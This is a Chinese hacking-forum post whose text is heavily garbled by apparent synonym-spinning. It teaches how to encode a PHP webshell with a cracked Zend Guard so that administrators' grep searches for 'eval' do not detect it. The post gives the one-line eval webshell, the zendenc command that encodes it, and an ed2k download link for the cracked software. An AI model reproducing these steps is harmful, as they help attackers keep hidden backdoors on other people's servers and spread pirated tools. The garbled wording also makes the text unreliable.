现在良多linux操持员都邑一招,grep?eval?大法,查找那些年错过的webshell,那些年错过的基友们苦思冥想出了统一的举措。
ZendGuard是一款php的加密东西,它或是编译php源码变成字节码,相反于java的虚构机的字节码,然后让zend虚构机运转字节码,以此来前进php的运转速度,因为毋庸虚构机,php运转脚本的门径是读一行代码,运转一行,屈就很低,而虚构机则屈就高多了,题外话,最新的php?5.5版本,zend虚构机增进了一个cache功能,将编译好的字节码储存到缓存中,每一段功夫果决php文件能否变动,不有变动的话,就间接从缓存中抽取字节码,大大前进了屈就。
而php的zend虚构机大行其道的日常平凡,我们或是把持大家都操纵zend加强屈就的大状况下,我们编译一个php?webshell的zend版本,来躲过操持员的grep。
安顿完毕当前,找到bin目录下zendenc.exe?便是我们的主角了。别忘记搞上破解版。
操纵方法,先找一个你要加密的php文件,例如iii.php。
然后在命令行外表输入:
Default| 1 | zendenc iii.php 33.php |
第二个参数是你的要加密的php文件,第三个参数是输出文件的名字.?附件外表有个最繁杂的webshell可加密当前的文件。
我们来看一下较量:
iii.php ? 加密前的源码
Default| 12345 | <?php eval($_POST['pass']); ?> |
输出后的33.php
彻底但凡看不懂的字节码,多么能很好的防御以文本格局搜检webshell的手段的查杀。括弧笑。
| 1 |
下载地址:(放到迅雷也许电驴之类的下载软件就行了.)
Default| 1 | ed2k://|file|Zend.Guard.v4.0.1.CRACKED.rar|32131874|436488700c480b1e853ee8ecfdc9ddce|h=M7EHRGTQDLQEUQONGAYE7NNDMCBBXITI|/ |
日币褒扬:
本文为原创科普文、首发,作者有各人的实践,文章模式对渗透较没救助,根据本站积分划定给以日币褒扬共5枚。
AD:本站零落凋落投稿及积分(日币),日币可兑换实物褒扬,每个月top3可得到礼品一份。
里面请看:积分划定 及 日币超市
